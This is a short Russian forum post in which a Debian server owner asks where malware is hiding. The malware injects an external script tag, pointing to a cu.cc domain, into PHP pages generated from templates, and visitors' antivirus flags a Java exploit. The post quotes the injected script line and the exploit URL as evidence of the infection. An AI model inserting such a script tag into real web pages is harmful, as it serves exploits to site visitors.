Сервер на Debian, подцепил какую-то бяку, она заразила сайт на этом сервере. Подписывает в php файлы, сгенерированные шаблонизатором, строку <script type="text/javascript" src="http://statun.cu.cc/counter.php"></script> В самих шаблонах ее нет, в файлах шаблонизатора тоже. В результате у пользователей, которые заходят на сайт, если антивирус Authentium, Eset, F-Prot, Kaspersky или McAfee, находитсяВирус HEUR:Exploit.Script.Generic в объекте [url]http://statscounter.cu.cc/content/pch.php?f=16[/url] (Exploit.Java.CVE-2010-0840.ch) Поиск в файлах сайта строки statun.cu.cc результата не дал. В папке с сайтом ничего подозрительного не нашлось. Clamav на сервере ничего не находит. Где эта гадость может сидеть?
|